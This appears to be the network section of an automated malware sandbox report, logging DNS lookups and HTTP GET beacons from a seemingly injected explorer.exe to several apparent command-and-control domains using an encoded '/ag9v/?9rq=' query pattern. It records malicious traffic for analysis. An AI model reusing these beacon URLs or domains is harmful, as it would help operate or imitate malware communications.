Oct 14, 2021 07:29:51.145488024 CEST  192.168.2.4  8.8.8.8  0x8c07    Standard query (0)  www.psychedeliccosmetics.com  A (IP address)  IN (0x0001)
Oct 14, 2021 07:29:56.321822882 CEST  192.168.2.4  8.8.8.8  0x2138    Standard query (0)  www.aceserial.xyz             A (IP address)  IN (0x0001)
Oct 14, 2021 07:30:07.181576967 CEST  192.168.2.4  8.8.8.8  0xaaa7    Standard query (0)  www.blackmagiccomics.com      A (IP address)  IN (0x0001)
Oct 14, 2021 07:30:12.243588924 CEST  192.168.2.4  8.8.8.8  0xa1cc    Standard query (0)  www.ebookgratis.online        A (IP address)  IN (0x0001)
Oct 14, 2021 07:30:17.323776960 CEST  192.168.2.4  8.8.8.8  0x3ce0    Standard query (0)  www.ovmfinacial.com           A (IP address)  IN (0x0001)
Oct 14, 2021 07:30:22.664800882 CEST  192.168.2.4  8.8.8.8  0x9df8    Standard query (0)  www.richartware.com           A (IP address)  IN (0x0001)
Oct 14, 2021 07:30:28.433368921 CEST  192.168.2.4  8.8.8.8  0xbb3c    Standard query (0)  www.dollpartyla.com           A (IP address)  IN (0x0001)
Oct 14, 2021 07:30:33.582624912 CEST  192.168.2.4  8.8.8.8  0x375b    Standard query (0)  www.quickcarehomeopathic.com  A (IP address)  IN (0x0001)

                                                          DNS Answers

                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                          Oct 14, 2021 07:29:45.550026894 CEST | 8.8.8.8 | 192.168.2.4 | 0x5aeb | No error (0) | www.marunouchi1.com |  | 183.90.240.3 | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:29:51.167728901 CEST | 8.8.8.8 | 192.168.2.4 | 0x8c07 | No error (0) | www.psychedeliccosmetics.com | psychedeliccosmetics.com |  | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 14, 2021 07:29:51.167728901 CEST | 8.8.8.8 | 192.168.2.4 | 0x8c07 | No error (0) | psychedeliccosmetics.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:29:56.353691101 CEST | 8.8.8.8 | 192.168.2.4 | 0x2138 | No error (0) | www.aceserial.xyz | aceserial.xyz |  | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 14, 2021 07:29:56.353691101 CEST | 8.8.8.8 | 192.168.2.4 | 0x2138 | No error (0) | aceserial.xyz |  | 151.106.117.36 | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:30:07.220613956 CEST | 8.8.8.8 | 192.168.2.4 | 0xaaa7 | Name error (3) | www.blackmagiccomics.com | none | none | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:30:12.267743111 CEST | 8.8.8.8 | 192.168.2.4 | 0xa1cc | No error (0) | www.ebookgratis.online |  | 104.21.2.218 | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:30:12.267743111 CEST | 8.8.8.8 | 192.168.2.4 | 0xa1cc | No error (0) | www.ebookgratis.online |  | 172.67.129.186 | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:30:17.425107002 CEST | 8.8.8.8 | 192.168.2.4 | 0x3ce0 | No error (0) | www.ovmfinacial.com |  | 199.59.242.153 | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:30:22.688800097 CEST | 8.8.8.8 | 192.168.2.4 | 0x9df8 | Name error (3) | www.richartware.com | none | none | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:30:28.462132931 CEST | 8.8.8.8 | 192.168.2.4 | 0xbb3c | No error (0) | www.dollpartyla.com | shops.myshopify.com |  | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 14, 2021 07:30:28.462132931 CEST | 8.8.8.8 | 192.168.2.4 | 0xbb3c | No error (0) | shops.myshopify.com |  | 23.227.38.74 | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST | 8.8.8.8 | 192.168.2.4 | 0x375b | No error (0) | www.quickcarehomeopathic.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST | 8.8.8.8 | 192.168.2.4 | 0x375b | No error (0) | parkingpage.namecheap.com |  | 198.54.117.210 | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST | 8.8.8.8 | 192.168.2.4 | 0x375b | No error (0) | parkingpage.namecheap.com |  | 198.54.117.218 | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST | 8.8.8.8 | 192.168.2.4 | 0x375b | No error (0) | parkingpage.namecheap.com |  | 198.54.117.215 | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST | 8.8.8.8 | 192.168.2.4 | 0x375b | No error (0) | parkingpage.namecheap.com |  | 198.54.117.212 | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST | 8.8.8.8 | 192.168.2.4 | 0x375b | No error (0) | parkingpage.namecheap.com |  | 198.54.117.211 | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST | 8.8.8.8 | 192.168.2.4 | 0x375b | No error (0) | parkingpage.namecheap.com |  | 198.54.117.216 | A (IP address) | IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST | 8.8.8.8 | 192.168.2.4 | 0x375b | No error (0) | parkingpage.namecheap.com |  | 198.54.117.217 | A (IP address) | IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • www.marunouchi1.com
                                                          • www.psychedeliccosmetics.com
                                                          • www.aceserial.xyz
                                                          • www.ebookgratis.online
                                                          • www.ovmfinacial.com
                                                          • www.dollpartyla.com

                                                          HTTP Packets

                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          0 | 192.168.2.4 | 49808 | 183.90.240.3 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Oct 14, 2021 07:29:45.850338936 CEST | 2545 | OUT | GET /ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_ HTTP/1.1
                                                          Host: www.marunouchi1.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 14, 2021 07:29:46.135214090 CEST | 2546 | IN | HTTP/1.1 302 Found
                                                          Server: nginx
                                                          Date: Thu, 14 Oct 2021 05:29:46 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 312
                                                          Connection: close
                                                          Location: https://www.marunouchi1.com/ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 72 75 6e 6f 75 63 68 69 31 2e 63 6f 6d 2f 61 67 39 76 2f 3f 39 72 71 3d 52 5a 78 4a 47 56 31 39 4e 4f 44 7a 36 2f 73 50 6c 35 30 72 63 73 6a 50 43 6d 68 66 66 30 42 32 63 51 4e 53 44 39 58 4e 48 6c 7a 75 41 6b 7a 33 74 57 79 31 74 7a 33 67 6e 73 76 32 49 49 33 4f 4b 66 58 77 26 61 6d 70 3b 42 46 51 3d 35 6a 49 30 6a 68 4d 48 41 30 68 78 5f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.marunouchi1.com/ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&amp;BFQ=5jI0jhMHA0hx_">here</a>.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          1 | 192.168.2.4 | 49814 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Oct 14, 2021 07:29:51.188764095 CEST | 5497 | OUT | GET /ag9v/?9rq=B7neoLnMPG5T4Lq1mgXXW304ryc0TDTB8h8f/WhOEZEEcWgrsd/ecy8wgWRxVB11aSvz&BFQ=5jI0jhMHA0hx_ HTTP/1.1
                                                          Host: www.psychedeliccosmetics.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 14, 2021 07:29:51.303333044 CEST | 5497 | IN | HTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Thu, 14 Oct 2021 05:29:51 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 275
                                                          ETag: "615f93b1-113"
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          2 | 192.168.2.4 | 49818 | 151.106.117.36 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Oct 14, 2021 07:29:56.615066051 CEST | 5654 | OUT | GET /ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_ HTTP/1.1
                                                          Host: www.aceserial.xyz
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 14, 2021 07:29:57.113888025 CEST | 6010 | IN | HTTP/1.1 403 Forbidden
                                                          Content-Type: text/html
                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: 0
                                                          Server: BitNinja Captcha Server
                                                          Date: Thu, 14 Oct 2021 05:29:57 GMT
                                                          Content-Length: 13724
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 
20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20
                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-align: center;} .link {margin-top: 40px;}


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          3 | 192.168.2.4 | 49841 | 104.21.2.218 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Oct 14, 2021 07:30:12.290184021 CEST | 6071 | OUT | GET /ag9v/?9rq=VDs0Hn8x6Kri7C1Uc2aKLXPFP0feJseWm2OJ8K++Wp+sqWdpvRON2LvjpBxhi0u2NedX&BFQ=5jI0jhMHA0hx_ HTTP/1.1
                                                          Host: www.ebookgratis.online
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 14, 2021 07:30:12.313358068 CEST | 6072 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Thu, 14 Oct 2021 05:30:12 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Cache-Control: max-age=3600
                                                          Expires: Thu, 14 Oct 2021 06:30:12 GMT
                                                          Location: https://www.ebookgratis.online/ag9v/?9rq=VDs0Hn8x6Kri7C1Uc2aKLXPFP0feJseWm2OJ8K++Wp+sqWdpvRON2LvjpBxhi0u2NedX&BFQ=5jI0jhMHA0hx_
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uxw1tsnKlgtB7W5LJtTa5eumSOBk%2BN%2BrDmS98GeIS3mtBU2HXDQ%2Buox4Xes1rOEFZ77hnABAYNvD5o6qlHscVIs9wqr%2BP69MQSOAASVdvEX0AMzTjdkTFWFC%2Fhu%2FOO1BvKLiRR5n%2F3t9"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 69de6a12dc6a5b6e-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          4 | 192.168.2.4 | 49842 | 199.59.242.153 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Oct 14, 2021 07:30:17.527385950 CEST | 6073 | OUT | GET /ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_ HTTP/1.1
                                                          Host: www.ovmfinacial.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 14, 2021 07:30:17.628267050 CEST | 6074 | IN | HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Thu, 14 Oct 2021 05:30:17 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: parking_session=927c3a40-3c29-567c-15c2-72d0a3410220; expires=Thu, 14-Oct-2021 05:45:17 GMT; Max-Age=900; path=/; HttpOnly
                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_j7GpDLGaTLJ0rhGNdo+VonizNelzx47mFEL9iz/Okv4QD4XHqfn9OfxM1Dhs8JbXoG2B2KZhqWK371CGAnlIig==
                                                          Cache-Control: no-cache
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-store, must-revalidate
                                                          Cache-Control: post-check=0, pre-check=0
                                                          Pragma: no-cache
                                                          Data Raw: 35 38 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6a 37 47 70 44 4c 47 61 54 4c 4a 30 72 68 47 4e 64 6f 2b 56 6f 6e 69 7a 4e 65 6c 7a 78 34 37 6d 46 45 4c 39 69 7a 2f 4f 6b 76 34 51 44 34 58 48 71 66 6e 39 4f 66 78 4d 31 44 68 73 38 4a 62 58 6f 47 32 42 32 4b 5a 68 71 57 4b 33 37 31 43 47 41 6e 6c 49 69 67 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 62 6f 64 69 73 63 64 6e 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 20 63 72 6f 73 73
                                                          Data Ascii: 589<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_j7GpDLGaTLJ0rhGNdo+VonizNelzx47mFEL9iz/Okv4QD4XHqfn9OfxM1Dhs8JbXoG2B2KZhqWK371CGAnlIig=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><link rel="dns-prefetch" href="https://parking.bodiscdn.com" crossorigin><link rel="dns-prefetch" href="https://fonts.googleapis.com" cross


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          5 | 192.168.2.4 | 49847 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Oct 14, 2021 07:30:28.510090113 CEST | 6097 | OUT | GET /ag9v/?9rq=K9/CDnPG5wdyl4CHzmgShg3gLBJ4YNT1Y6jAhZ/FXp8/egWH1BEUOuCtjJEICRxztW+Z&BFQ=5jI0jhMHA0hx_ HTTP/1.1
                                                          Host: www.dollpartyla.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 14, 2021 07:30:28.557862997 CEST | 6099 | IN | HTTP/1.1 403 Forbidden
                                                          Date: Thu, 14 Oct 2021 05:30:28 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          X-Sorting-Hat-PodId: 189
                                                          X-Sorting-Hat-ShopId: 59880997054
                                                          X-Request-ID: ff951e54-78cb-49de-931e-6e9b39ead4a9
                                                          X-Permitted-Cross-Domain-Policies: none
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Download-Options: noopen
                                                          X-Content-Type-Options: nosniff
                                                          X-Dc: gcp-europe-west1
                                                          CF-Cache-Status: DYNAMIC
                                                          Server: cloudflare
                                                          CF-RAY: 69de6a78386b698b-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 